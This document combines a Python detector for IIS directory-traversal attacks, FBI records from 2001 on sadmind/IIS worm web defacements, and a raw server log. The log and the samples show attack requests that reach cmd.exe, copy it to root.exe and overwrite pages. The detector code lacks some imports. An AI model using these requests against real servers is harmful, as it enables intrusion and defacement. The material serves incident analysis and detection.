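from urllib.parse import unquote_to_bytes

# Constructed sample in IIS 4.0/5.0 W3C extended log format (not taken from
# the FBI file). Addresses are RFC 5737 documentation ranges, not real hosts.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Server 4.0
#Version: 1.0
#Date: 2001-05-08 16:03:11
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2001-05-08 16:03:11 203.0.113.45 GET /default.htm - 200
2001-05-08 16:03:14 198.51.100.7 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 200
2001-05-08 16:03:15 198.51.100.7 GET /scripts/..%c1%9c../winnt/system32/cmd.exe /c+dir+c:\\ 200
2001-05-08 16:03:19 198.51.100.7 GET /scripts/../../winnt/system32/cmd.exe /c+echo+defaced+>+c:\\inetpub\\wwwroot\\default.htm 200
2001-05-08 16:04:02 203.0.113.45 GET /images/logo.gif - 304
2001-05-08 16:05:40 192.0.2.99 GET /scripts/..%255c../winnt/system32/cmd.exe /c+dir 404
"""

# Assumed: the two overlong UTF-8 sequences most often seen in MS00-078
# traversal requests, which IIS's lenient decoder accepted as '/' and '\'.
OVERLONG = {b"\xc0\xaf": b"/", b"\xc1\x9c": b"\\"}

# A '..' path segment anywhere in the normalized stem.
TRAVERSAL = re.compile(r"(^|/)\.\.(/|$)")


def normalize_uri(stem: str, rounds: int = 2) -> str:
    """Percent-decode a URI stem the way a lenient server would: up to `rounds`
    passes (so %255c double encoding is caught), overlong sequences mapped to
    the separators they stand for, and backslashes folded to '/'."""
    s = stem
    for _ in range(rounds):
        raw = unquote_to_bytes(s)
        for enc, plain in OVERLONG.items():
            raw = raw.replace(enc, plain)
        s = raw.decode("latin-1")
    return s.replace("\\", "/")


def is_traversal(stem: str) -> bool:
    """True if the stem climbs out of its directory or targets cmd.exe."""
    norm = normalize_uri(stem).lower()
    return bool(TRAVERSAL.search(norm)) or norm.endswith("/winnt/system32/cmd.exe")


def parse_iis_log(text: str) -> list:
    """Parse W3C extended format using the log's own #Fields directive."""
    fields, records = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line.strip() or line.startswith("#"):
            continue
        if fields is None:
            raise ValueError("data line before #Fields directive")
        values = line.split()
        if len(values) != len(fields):
            continue  # truncated or garbled line: skip rather than guess
        records.append(dict(zip(fields, values)))
    return records


def triage(text: str) -> dict:
    """Flag traversal requests, group them by source IP, and record first contact.
    W3C extended logs are written in GMT; convert before comparing against a
    firewall log that keeps local time."""
    hits = [r for r in parse_iis_log(text) if is_traversal(r["cs-uri-stem"])]
    by_ip = Counter(r["c-ip"] for r in hits)
    first_seen = {}
    for r in hits:
        first_seen.setdefault(r["c-ip"], f"{r['date']} {r['time']} GMT")
    succeeded = [r for r in hits if r["sc-status"] == "200"]
    return {"hits": hits, "by_ip": by_ip, "first_seen": first_seen, "succeeded": succeeded}


if __name__ == "__main__":
    result = triage(SAMPLE_LOG)
    for ip, n in result["by_ip"].most_common():
        print(f"{ip}: {n} traversal request(s), first seen {result['first_seen'][ip]}")
```

Run as a script it prints one line per source address; the `first_seen` values are what an FD 302 would carry for correlation with the firewall's own timestamp, after allowing for the firewall's local clock, and the `succeeded` list separates requests the server actually executed (status 200) from scans it refused.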


b3 
b7E 




LEAD (s): 
Set Lead 1: 
COUNTERTERRORISM 
AT WASHINGTON, DC 
Read and clear. 
Set Lead 2: 
CHICAGO 
AT CHICAGO, IL 
Take action deemed appropriate. 
++ 


FD-71 (Rev. 3-27-95)
Complaint Form 


NOTE: Hand print names legibly: handwriting satisfactory for remainder. 
Indices: L] Negative [7] See below 


Subject's name and aliases Character of case 
b3 
UNSUB 
b7E 
Complainant Protect Source 
b6 
b7C 


Complaint received 


[.] Personal Telephonic Date 5/9/01 Time, 10:15 a 


Address of Subject Complainant's address and telephone number 


North American Benefits Network 
19800 Detroit Rd, Rocky River, OH 


Complainant's DOB Sex 
Male 


Scars, marks and other data 


Employer Address Telephone 


Subject's 
Description 


Vehicle Description 


Facts of Complaint 


[Redacted], North American Benefits Network (NABN), advised that the company's network had been
b7C


hacked into on 5/8/01. The hacker came in through a dial-in port and 
altered several web pages with the words "fuck the U.S. Government." 
North American Benefits Network operates as a healthcare administrator 
for 39 states throughout the country. 


[Redacted], which oversees the websites, can provide the
specific technical information regarding the hack.


Do not write in this space. 


b6 
b7C 


(Complaint received by) BLOCK STAMP


[Redacted] advised that when NABN contacted the company
that services their network, the company representative indicated
that Charter One bank had also been hacked into. Based upon the
message left by the hacker, the Charter One hack appears to have
been done by the same individual.


b6 
b7C 




FD-542 (Rev. 11-02-1999)


FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/23/2001 
To: Chicago Attn: SA [redacted]
Cleveland
From: Cleveland
Squad 16
Contact: SA [redacted] (216) 622-6917


Approved By:
Drafted By: 


Case ID #: 


Title: UNSUB (S), CHINA; 
NORTH AMERICAN BENEFITS NETWORK, 
ROCKY RIVER, OH - VICTIM; 
COMPUTER INTRUSIONS 


Synopsis: To report investigative accomplishments re: captioned 
matter to Chicago Division. 


Details: The following investigative accomplishments are being 
reported for investigative efforts related to recent Cleveland 
Division complaints re: SADMIND/IIS worm originating from China. 
Complaints were sent to Chicago Division under the captioned matter.


Accomplishment Information: 
Number: 1 


Type: NIPCIP COMPROMISED SITE IDENTIFIED AND NOTIFIED 
ITU: NIPCIP 


Claimed By: 
SSN: 
Name: 
Squad: 16 
Number: 1 


Type: NIPCIP VICTIM CONTACTED/INTERVIEWED 
ITU: NIPCIP 
Claimed By: 

SSN: 


Squad: 16 


b3 
b6 
b7C 
b7E 


b6 
b7C


b7E 


To: Chicago From: Cleveland
Re: [redacted] 05/23/2001


Number: 1 
Type: NIPCIP FOREIGN SOURCE IP ADDRESS IDENTIFIED 
ITU: NIPCIP 
Claimed By:
SSN:
Name:
Squad:


Number: 1 
Type: NIPCIP SUBJECT TOOL/EXPLOIT/MALICIOUS CODE IDENTIFIED 
ITU: NIPCIP 
Claimed By:
SSN: 
Name: 
Squad: 


b3 
b7E 


b6 
b"7C 


To: Chicago From: Cleveland
Re: [redacted] 05/23/2001
LEAD (s): 
Set Lead 1: 

CHICAGO 


AT CHICAGO, IL 


Read and clear. 


** 




b3 
b7E 


FEDERAL BUREAU OF INVESTIGATION 


FD-542 (Rev. 11-02-1999) 


Precedence: ROUTINE Date: 05/17/2001 
To: Chicago Attn: SA b3
b6
b7C
From: Cleveland
Squad 16
Contact: SA (216)622-6917
Approved By:
Drafted By:
Case ID #: (Pending)
Title:  UNSUB(S), CHINA; 
SOUTHWEST GENERAL HOSPITAL, CLEVELAND, OH; 
BETHUNE COOKMAN COLLEGE, DAYTONA BEACH, FL; 
COMPUTER INTRUSIONS 
Synopsis: To report investigative accomplishments re: captioned 
matter to Chicago Division. 
Details: The following investigative accomplishments are being reported for investigative efforts related to recent Cleveland Division complaints re: SADMIND/IIS worm originating from China. Complaints were sent to Chicago Division - captioned matter.
Accomplishment Information: 
Number: 2 
Type: NIPCIP COMPROMISED SITE IDENTIFIED AND NOTIFIED 
ITU: NIPCIP 
Claimed By:
SSN: b6 
Name: b7C 
Squad: 16 
Number: 2 


Type: NIPCIP VICTIM CONTACTED/INTERVIEWED 
ITU:  NIPCIP 


Claimed By:
SSN: 
Name: 


Squad: 16 


Number: 2 


To: Chicago From: Cleveland
Re: 05/17/2001 b3


b7E 


Type: NIPCIP FOREIGN SOURCE IP ADDRESS IDENTIFIED 
ITU: NIPCIP 


Claimed By: 
SSN: b6 
Name: b7C 


Squad: 16 


Number: 1 
Type: NIPCIP SUBJECT TOOL/EXPLOIT/MALICIOUS CODE IDENTIFIED 
ITU: NIPCIP


Claimed By:
SSN: 
Name: 


Squad: 16 


To: Chicago From: Cleveland
Re: 05/17/2001


LEAD (s): 
Set Lead 1: 
CHICAGO 


AT CHICAGO, IL 
Action deemed appropriate. 




b3 
b7E 




FD-542 (Rev. 11-02-1999)


FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/17/2001 


To: Chicago Attn: SA b3
b6
Cleveland
b7C
From: Cleveland b7E
Squad 16
Contact: (216) 622-6917
Approved By:
Drafted By:


Case ID #: (Pending)


Title:  UNSUB(S), CHINA; 
DIGICOMM TECHNOLOGY INC., MAUMEE, OH - VICTIM; 
COMPUTER INTRUSIONS 


Synopsis: To report investigative accomplishments re: captioned 
matter to Chicago Division. 


Details: The following investigative accomplishments are being reported for investigative efforts related to recent Cleveland Division complaints re: SADMIND/IIS worm originating from China. Complaints were sent to Chicago Division - captioned matter.


Accomplishment Information: 


Number: 1 

Type: NIPCIP COMPROMISED SITE IDENTIFIED AND NOTIFIED 

ITU: NIPCIP 

Claimed By: 
SSN: b6 
Name: b7C 
Squad: 16 


Number: 1 
Type: NIPCIP VICTIM CONTACTED/INTERVIEWED 
ITU: NIPCIP 
Claimed By:
SSN: 
Name: 
Squad: 16 


Number: 13 
Type: NIPCIP FOREIGN SOURCE IP ADDRESS IDENTIFIED 


b7E 


To: Chicago From: Cleveland
Re: 05/17/2001 b3
b7E


ITU: NIPCIP 


Claimed By:
SSN: b6 
Name: b7C 
Squad: 

Number: 1 


Type: NIPCIP SUBJECT TOOL/EXPLOIT/MALICIOUS CODE IDENTIFIED 
ITU: NIPCIP 


Claimed By: 
SSN: 
Name: 


Squad: 16 


To: Chicago From: Cleveland
Re: 05/17/2001


LEAD (s): 
Set Lead 1: 
CHICAGO 


AT CHICAGO, IL


Read and clear. 




(Rev. 08-28-2000)


FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/22/2001 


To: Counterterrorism Attn: NIPC, CIU, SSA b3 
Chicago SA b6 
b7C


From: Cleveland 
Squad 16 
Contact: (216) 622-6917


Approved By:
Drafted By:
Case ID #: (Pending)


Title:  UNSUB(S), CHINA; 
DIGICOMM TECHNOLOGY INC., MAUMEE, OH - VICTIM; 
COMPUTER INTRUSIONS


Synopsis: To report complaint received at Cleveland Division re: 
victims of SADMIND/IIS worm originating from China. 


Enclosure: One FD-340 containing evidence from Digicomm 
Technology Inc. 


Details: In response to an E-mail complaint filed with NIPC Watch and Warning Unit on 05/17/2001, writer telephonically contacted [redacted], Digicomm Technology Inc. (DTI), 135 Chesterfield Lane, #203, Maumee, OH, work telephone number [redacted], on 05/22/2001. [Redacted] advised as follows:
b6
b7C


Sometime on the morning of 05/15/2001, the home page on 
DTI's external E-mail server, neo.digicomm-tech.com, IP address 
207.43.111.114, was defaced with anti-American remarks "Fuck the 
U.S. government" and "Fuck poizon box." The victim computer was 
running MS Windows 2000 Server (service pack 1), MS Internet 
Information Server (IIS) v5.0, and MS Exchange v5.5. The victim 
computer is an E-mail server. The following files were installed 
on the victim computer in all sub-directories of IIS: index.htm, 
index.asp, default.htm, and default.asp. The file, command.exe, 
located in the /scripts directory, was renamed to root.exe. 


Log file, ex010515.txt, on the victim computer, identified the originating IP address of the attack as 211.93.80.20 (China). The log file is contained on a floppy diskette in the enclosed FD-340. Also enclosed in the FD-


b3 
b7E 




To: Counterterrorism From: Cleveland
Re: 05/22/2001


340 is a report, provided by [redacted], of subsequent failed intrusion attempts originating from Southeast Asia.


[Redacted] did not discover the problem until 05/17/2001. To date, DTI has incurred a financial loss of approximately $675 in man hours investigating the incident.


Cleveland Division is providing the aforementioned 
information to NIPC for informational purposes and to Chicago 
Division for any action deemed appropriate. 


To: Counterterrorism From: Cleveland
Re: 05/22/2001


b7E 


LEAD (s): 
Set Lead 1: 
COUNTERTERRORISM 
AT WASHINGTON, DC 
Read and clear. 
Set Lead 2: 
CHICAGO 
AT CHICAGO, IL 
Take action deemed appropriate. 


FEDERAL BUREAU OF INVESTIGATION 


(Rev. 08-28-2000) 


Precedence: ROUTINE Date: 05/22/2001 
To: Counterterrorism Attn:  NIPC, CIU 
SSA 
Chicago SA 
From: Cleveland 
Squad 16 
Contact: SA 216-622-6904 


Approved By:


Drafted By: 


Case ID #: (Pending)
Title: Unsub(s); 


Jesu Catholic Elementary School - Victim; 
Impairment - Web Page Defacement 


Synopsis: Web page defacement in the Cleveland FO territory. 


Details: [Redacted] of Jesu Catholic Elementary School, located at 2450 Miramir Street, University Heights, Ohio 44118, employment telephone number of [redacted], informed the Agent that the school's web page had been defaced by an Unsub(s) on May 16, 2001.


The web page was defaced with the following: 
"Fuck USA Government 
Fuck POIZON BOX 


Contact: Sysadmcn@Yahoo.com.cn"


Jesu Catholic Elementary School's computer network was 
not manipulated beyond the web page defacement. The files on the 
network were not deleted or corrupted and no harmful viruses were 
discovered. 


Jesu Catholic Elementary School suffered a financial 
loss of less than $1,000.00 in regards to this web page 
defacement. 


b3 
b6 
b7C 
b7E 


b6 
b7C 


To: Counterterrorism From: Cleveland


LEAD (s): 
Set Lead 1: (Adm) 
COUNTERTERRORISM 


AT WASHINGTON, DC 


Read and Clear. 
Set Lead 2: (Adm) 
CHICAGO 


AT CHICAGO 


Re: 05/22/2001 b3
b7E 


This information is provided to Chicago for whatever 
investigative action is deemed appropriate. 




FEDERAL BUREAU OF INVESTIGATION 


(Rev. 08-28-2000) 


Precedence: ROUTINE Date: 05/22/2001 
To: Counterterrorism Attn:  NIPC, CIU 
SSA

Chicago SA 

From: Cleveland 
Squad 16 
Contact: SA 216-622-6904

Approved By:
Drafted By:


Title: Unsub(s);
CRM Solutions - Victim; 
Impairment - Web Page Defacement 


Case ID #:


Synopsis: Web page defacement in the Cleveland FO territory. 


Details: [Redacted] of CRM Solutions, located at 4065 Shuffel Drive N.W., North Canton, Ohio 44770, employment telephone number of [redacted], informed the Agent that on May 9, 2001 their web page had been defaced by an Unsub(s).


The web page had been defaced with the following: 
"FUCK USA Government"


[Redacted] also informed the Agent that approximately one week prior to the web page defacement, their computer network had been scanned by an Unsub(s). [Redacted] believed that the Unsub(s) had performed reconnaissance of their network prior to defacing the web site.


Subsequent to the web page defacement, [redacted] and his employees analyzed CRM's computer network and discovered that one of the drives had been 'wormed' via 'IIS' and the Unsub(s) had gained access to their network via a buffer overflow.


b3 
b6 
b7C 
b7E 


b6 
b7C 


To: Counterterrorism From: Cleveland


b7E 


LEAD (s): 
Set Lead 1: (Adm) 
COUNTERTERRORISM 


AT WASHINGTON, DC 


Read and Clear. 
Set Lead 2: (Adm) 
CHICAGO 
AT CHICAGO 
This information is provided to Chicago for whatever investigative action is deemed appropriate.




(Rev. 08-28-2000)
FEDERAL BUREAU OF INVESTIGATION


Precedence: ROUTINE Date: 05/16/2001 


To: Counterterrorism Attn: NIPC, CIU b3
Chicago, SA b7C
b7E


From: Cleveland 


Contact: 216.622.6867


Drafted By:

Case ID #: 

Title: Unsub (s); 
Relevant Business Solutions - Victim; 
Impairment - Web Page Defacement 


Synopsis: Web page defacement in the Cleveland FO territory. 


Enclosure(s): One (1) floppy diskette containing a compressed 
directory and log file. 


b6 
b7C 


Details: On 05/15/2001, [redacted] of Relevant Business Solutions, telephone [redacted], email [redacted], advised that one of his company's web pages located at http://phone.relevantsolutions.com had been defaced by a hacker. The normal contents of the web page were replaced with the words "fuck USA Government fuck PoizonBOx contact:sysadmcn@yahoo.com.cn". [Redacted] was not aware of how his web page was defaced nor of how much damage was done to his system aside from the defaced web page. [Redacted] provided writer with a compressed file containing the contents of his company's wwwroot directory and a month of log files from the system.


b7E 


To: Counterterrorism From: Cleveland
Re: 05/16/2001 b3


LEAD(s): 
Set Lead 1: (Adm) 
COUNTERTERRORISM 


AT WASHINGTON, DC 


Read and Clear. 
Set Lead 2: (Adm) 
CHICAGO 


AT CHICAGO 


b7E 


This information is provided to Chicago for whatever 
investigative action is deemed appropriate. 




(Rev. 10-01-1999)


FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/23/2001 
b6
From: Atlanta b7C
Squad 17 b7E
Contact: x6220


Approved By: 


Drafted By: 


Case ID #: (Pending)


Title:  Hacker/Honker Union of China 
Illinois Secretary of State - Victim 
Computer Intrusion 
04/03/2001 


Synopsis: To advise Chicago of complaints involving Chinese 
Hacker activity received by Atlanta Division. 


Administrative: Re telcal of SA [redacted] to SA [redacted] on 5/22/2001.
b6
b7C


Details: Over the last several weeks Atlanta has received numerous complaints regarding website defacements with pro-Chinese/anti-US messages. Most of the defacements matched characteristics of the Sadmind worm. They appeared to be scripted defacements where the same file, named index.htm, index.asp, default.htm, and default.asp, was written to multiple locations on the webserver in an attempt to deface it. Atlanta does not intend to open any cases on these complaints, as the reported damage has been minimal. Atlanta requested webserver log files from each complainant, but only a fraction of them have provided the requested information. Atlanta plans no further investigation into these matters.


The following complainants responded back to the 
Atlanta Division as of 5/23/2001: 


Name:


Company:  Souther -Qn iates bic 
Telephone Number: 


Enclosure(s): Eleven 1A Envelopes containing copies of e-mails sent to Atlanta by complainants.


b7E 


To: Chicago From: Atlanta
Re: 05/23/2001


Date of Complaint: 5/18/2001 

Nature of Complaint: Two defaced NT/IIS webservers (1 matching 
Sadmind characteristics, the other was unknown), and one Unix 
machine they reloaded because it crashed. No positive indication 
of hacking on the Unix machine. 


Name: 


Company: Healthcare Technologies Inc. 

Telephone Number:

Date of Complaint: 5/10/2001 

Nature of Complaint: Defaced webserver (matching Sadmind characteristics). [Redacted] included other, unrelated hacking incidents in his complaint that dated back to February 2001.


Company:  VSI Enterprises 
Telephone Number:
Date of Complaint: 5/7/01 


Nature of Complaint: Website defacement, NT/IIS server. 
Characteristics match Sadmind worm. 


Name: 
Company: T Communications 


Telephone Number: 
Date of Complaint: 5/6/01 
Nature of Complaint: Website defacement, NT/IIS server. 


Name: 

Company: Facility Pro 

Telephone Number: 

Date of Complaint: 5/6/2001 

Nature of Complaint: Website defacement, NT/IIS server. 
Characteristics match Sadmind worm. 


Name:
Company: Shared Services 


Telephone Number: 

Date of Complaint: 5/11/2001 

Nature of Complaint: Website defacement, NT/IIS server. 
Characteristics match Sadmind worm. 


Name: 


Company: Bulloch County School System 
Telephone Number:
Date of Complaint: 5/9/2001 


Nature of Complaint: Website defacement, NT/IIS server. 
Characteristics match Sadmind worm. 
To: Chicago From: Atlanta
Re: 05/23/2001


Company:  Objectware, Inc. 

Telephone Number:

Date of Complaint: 5/07/2001 

Nature of Complaint:  Attempted website defacement incapacitated 
servers. 


Name: 

Company: Peachtree Metals, Inc. 

Telephone Number: 770-476-7000 ext. [redacted]

Date of Complaint: 5/8/2001 

Nature of Complaint: website defaced, webserver content deleted. 
Intruder left a Chinese flag on the hacked page. 


Name:


Company:  Cignify 

Telephone Number:

Date of Complaint: 5/13/2001 

Nature of Complaint: Website defacement, NT/IIS server. 
Characteristics match Sadmind worm. 


Name: 

Company: Cashiers' Resort Rentals 

Telephone Number: 

Date of Complaint: 5/8/2001 

Nature of Complaint: Website defacement, NT/IIS server. 
Characteristics match Sadmind worm. 


Name: 

Company: Habitat for Humanity International 

Telephone Number: 229-924-6935 ext. 

Date of Complaint: 5/8/2001 

Nature of Complaint: Website defacement, NT/IIS server. 
Characteristics match Sadmind worm. 


Company : sl.ne 


Telephone Number: 770-425-5700 x[redacted]

Date of Complaint: 5/10/2001 

Nature of Complaint: Website defacement with Chinese characters on one of Mullins' customers' sites, Trailworks.com. The customer is physically located in Portland, Oregon.


Name:
Company: Tech Electronics, Inc. 


Telephone Number: 

Date of Complaint: 5/11/2001 

Nature of Complaint: Two website defacements on NT/IIS servers. Characteristics match Sadmind worm. [Redacted] also reported an


b3 
b7E 


b6 
b7C 


To: Chicago From: Atlanta
Re: 05/23/2001


unrelated incident where an intruder set up a file server on 
another machine. 


Name: 

Company: Cox Communications 

Telephone Number: 

Date of Complaint: 5/07/2001 

Nature of Complaint:  Defaced webpage with a pro-Chinese message. 


Company: Applied Software


Telephone Number: 
Date of Complaint: 5/7/2001 
Nature of Complaint: Website defacement on NT/IIS server. 


Characteristics of Sadmind worm. Also infection with the Sadmind worm on a Sun Sparc computer.


Name: 

Company: Powell, Goldstein, Frazer, & Murphy LLP 
Telephone Number: 

Date of Complaint: 5/8/2001 

Nature of Complaint: Website defacement on NT/IIS server. 
Characteristics of Sadmind worm. 


Name: 

Company: Dewey Colorsystem 

Telephone Number: 

Date of Complaint: 5/3/2001 

Nature of Complaint: Website defacement on NT/IIS server with 
pro-Chinese message. 


Company: Enterprise Computing Services, Inc. 


Telephone Number: 

Date of Complaint: 5/3/2001 

Nature of Complaint: Website defacement on NT/IIS server. 
Characteristics of Sadmind worm. 


Name:

Company:  Dekalb County School System 

Telephone Number:

Date of Complaint: 5/9/2001 

Nature of Complaint: Website defacement on NT/IIS server with 
pro-Chinese message. 


Atlanta considers this lead covered. 
FEDERAL BUREAU OF INVESTIGATION


FD-302 (Rev. 10-6-95) 


Date of transcription 05/22/2001 


[Redacted] of GREAT ARC TECHNOLOGIES, INC. (GREAT ARC), 205 West Wacker Drive, Suite 1320, Chicago, Illinois, telephone number [redacted], Web site www.dgreatarctech.com, e-mail address [redacted], was interviewed at his place of employment. After [redacted] was advised as to the identity of the interviewing agent and the nature of the interview, he provided the following information:


The Web site for GREAT ARC was defaced on three separate occasions during the dates of May 5 and May 6, 2001. The defacement was the same on all three occasions. The defacement stated "fuck USA Government fuck PoizonBOx contact:sysadmincn@yahoo.com.cn".


In addition to the Web site defacement, the hacker made modifications in approximately twenty directories. The hacker also deleted some inactive code [redacted] for a client of GREAT ARC. The directories [redacted] deleted were of little value to GREAT ARC. [Redacted] estimated the total loss suffered by GREAT ARC to be approximately $2,000.


[Redacted] analyzed the server activity during the attack and determined that the attack was only able to go as far as GREAT ARC.
GREAT ARC had the necessary sub files to keep the attack from going 
any further. 


[Redacted] provided the investigating agent with a compact disk containing the log files for the attack. [Redacted] was unable to provide the firewall files for the attack.


Investigation on 05/21/2001 at Chicago, Illinois


File # Date dictated N/A 


by 


This document contains neither recommendations nor conclusions of the FBI. It is the property of the FBI and is loaned to your agency; 
it and its contents are not to be distributed outside your agency. 
FD-302 (Rev. 10-6-95)


FEDERAL BUREAU OF INVESTIGATION 


Date of transcription 05/22/2001 


[Redacted] of E.P. WACHS, 100 Shepherd Street, Wheeling, Illinois, telephone number [redacted], was contacted telephonically. After [redacted] was advised of the identity of the interviewing agent and the nature of the interview, he provided the following information:


On May 14, 2001 the Web site for E.P. WACHS, a manufacturing company, was defaced with the message "fuck USA Government fuck PoizonBOx contact:sysadmincn@yahoo.com.cn". [Redacted] analyzed the system and determined that the defacement was the only damage.


[Redacted] is not sure if the system was set up to record log files. [Redacted] will contact the investigating agent if log files are available.


Investigation on 05/21/2001 at Chicago, Illinois (telephonically)


Date dictated N/A 


This document contains neither recommendations nor conclusions of the FBI. It is the property of the FBI and is loaned to your agency; 
it and its contents are not to be distributed outside your agency. 
FD-302 (Rev. 10-6-95)


FEDERAL BUREAU OF INVESTIGATION 


Date of transcription 05/22/2001
[Redacted] of KEMPER INSURANCE GROUP (KEMPER), One Kemper Drive, Long Grove, Illinois, telephone number [redacted], was interviewed telephonically. After [redacted] was advised of the identity of the interviewing agent and the nature of the interview, he provided the following information:
b6
b7C


On Friday, May 4, 2001, two of KEMPER's Web sites suffered defacements. One site was a default Web site for the KEMPER network. The other was not an actual Web site but an IP address that KEMPER agents access to input their monthly reports. The Web sites were down from the time of the attack until Monday, May 7, 2001.


The default site was defaced with the message "fuck USA Government fuck PoizonBOx contact:sysadmincn@yahoo.com.cn". Through his analysis, [redacted] determined that the attack was using the SADMIND Worm and was originating from SAINT MARY'S COLLEGE.
b6
b7C


The IP was defaced with the message "Hacked by DP Sun from KJTU". [Redacted] traced this attack to the Asian Pacific Network.


The two servers were running Windows IIS, but did not have the necessary security patches to prevent the attacks. The servers have been repaired and the necessary security patches are now in place. The loss suffered by KEMPER was approximately $22,000.


On Sunday, May 20, 2001, approximately 100 scanning attempts were made on KEMPER's servers. The scanning attempts were originating from the Asian Pacific Network.


[Redacted] will provide the investigating agent with copies of the log files relating to the defacements and scanning attempts.
b6
b7C
Investigation on 05/21/2001 at Chicago, Illinois (telephonically)

b3 

File # Date dictated N/A b6 

b7C 

by b7E 


This document contains neither recommendations nor conclusions of the FBI. It is the property of the FBI and is loaned to your agency; 
it and its contents are not to be distributed outside your agency. 
FEDERAL BUREAU OF INVESTIGATION


Precedence: ROUTINE Date: 05/23/2001 
To: Chicago Attn: SA b3
Squad IP/C b6
b7C
From: Minneapolis
Bismarck RA
Contact: SA 701/223-4875
Approved By: 
Drafted By: 
Title:  Hacker/Honker Union of China; 
Illinois Secretary of State - Victim; 
Synopsis: Lead covered at Bismarck, North Dakota. 
Administrative: RE: Chicago EC to Bismarck RA dated 05/09/2001. 
Enclosure(s): For SA [redacted], Chicago Division, one 1A envelope b6
containing a computer CD for analysis, copy of log files from b7C 
affected computer and one copy of Bismarck Police Department 
report regarding computer intrusion of local businesses. 
Details: On May 7, 2001, SA [redacted], Bismarck RA, was contacted by [redacted], who are local computer contractors for various businesses. [Redacted] advised sometime during the early morning hours of May 7, 2001, someone hacked into a local computer network and defaced several web-pages of local businesses.
b6
b7C


SA [redacted] met [redacted] at Schumacher's Diamond Cutters, 714 S. Second, Bismarck, North Dakota, telephone number [redacted], to discuss what happened to their network and web-page. After meeting with the computer contractors, SA [redacted] requested [redacted] to copy the computer's log files and, if possible, provide a CD of the log files and other information to assist with the investigation. [Redacted] provided the CD to SA [redacted] May 8, 2001.


b7E 


b3
To: Chicago From: Minneapolis
Re: 05/23/2001


b6 
[Redacted] of Ideapool Inc., 2010 46th Avenue, Southeast, Mandan, North Dakota, telephone number [redacted], and [redacted] of Payroll and Bookkeeping Services, of the same address, telephone number [redacted], stated they would provide detailed information if the Case Agent in Chicago needed a follow-up interview.
b7C


Bismarck considers this matter closed. 


To: Chicago From: Minneapolis
Re: 05/23/2001 b3


b7E 


LEAD (s): 
Set Lead 1: (Adm) 
CHICAGO 
AT CHICAGO, ILLINOIS 


Read and clear. 
untitled


134.129.130.35, -, 5/7/01, 12:14:08, W3SVC1, CSM SERVER, 192.168.2.150, 1382, 432, 146, 304, 0, GET, /images/Buttons/button.gif, -,
134.129.130.35, -, 5/7/01, 12:14:08, W3SVC1, CSM SERVER, 192.168.2.150, 10, 387, 11466, 200, 0, GET, /DEFAULT.ASP, -,
134.129.130.35, -, 5/7/01, 12:14:10, W3SVC1, CSM SERVER, 192.168.2.150, 2042, 431, 147, 304, 0, GET, /images/Buttons/hover.gif, -,
134.129.130.35, -, 5/7/01, 12:14:12, W3SVC1, CSM SERVER, 192.168.2.150, 2534, 432, 146, 304, 0, GET, /images/Buttons/button.gif, -,
193.140.77.2, -, 5/7/01, 12:20:26, W3SVC1, CSM SERVER, 192.168.2.150, 110, 66, 813, 200, 0, GET, /scripts/../../winnt/system32/cmd.exe, /c+dir,
193.140.77.2, -, 5/7/01, 12:20:26, W3SVC1, CSM SERVER, 192.168.2.150, 30, 70, 753, 200, 0, GET, /scripts/../../winnt/system32/cmd.exe, /c+dir+..\,
193.140.77.2, -, 5/7/01, 12:20:29, W3SVC1, CSM SERVER, 192.168.2.150, 110, 100, 382, 502, 0, GET, /scripts/../../winnt/system32/cmd.exe, /c+copy+\winnt\system32\cmd.exe+root.exe,
193.140.77.2, -, 5/7/01, 12:20:34, W3SVC1, CSM SERVER, 192.168.2.150, 80, 423, 355, 502, 0, GET, /scripts/root.exe, /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.com.cn^</html^>>.././index.asp,
193.140.77.2, -, 5/7/01, 12:20:34, W3SVC1, CSM SERVER, 192.168.2.150, 30, 423, 355, 502, 0, GET, /scripts/root.exe, /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.com.cn^</html^>>.././index.htm,
24.220.29.170, -, 5/7/01, 12:45:54, W3SVC1, CSM SERVER, 192.168.2.150, 90, 305, 11574, 200, 0, GET, /DEFAULT.ASP, -,
24.220.29.170, -, 5/7/01, 12:45:54, W3SVC1, CSM SERVER, 192.168.2.150, 1042, 312, 14505, 200, 0, GET, /animate.js, -,
24.220.29.170, -, 5/7/01, 12:45:56, W3SVC1, CSM SERVER, 192.168.2.150, 991, 320, 22372, 200, 0, GET, /images/cdalin
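The request sequence in the log above (directory traversal to cmd.exe, copying it to root.exe under /scripts, then echoing the defacement page into index.asp and index.htm) is the same one the Cleveland and Atlanta reports describe. The following Python is an added example, not part of the FBI record: a small parser for this comma-separated IIS log format that flags those indicators and attributes them to a source address. The sample lines are constructed, with the documentation addresses 192.0.2.10 and 198.51.100.7 standing in for real clients, and the %5c traversal variant in the comments is a generalisation beyond the literal requests on the page.

```python
# Added example (not part of the FBI record): flag the sadmind/IIS worm's
# request sequence in the comma-separated Microsoft IIS log format seen in
# the Bismarck enclosure. Sample lines below are constructed.
import re
from dataclasses import dataclass, field
from urllib.parse import unquote

# Field order of the IIS log lines in the record (15 fields, trailing comma).
FIELDS = [
    "client_ip", "user", "date", "time", "service", "server_name", "server_ip",
    "time_taken", "bytes_sent", "bytes_received", "status", "win32_status",
    "method", "uri_stem", "query",
]

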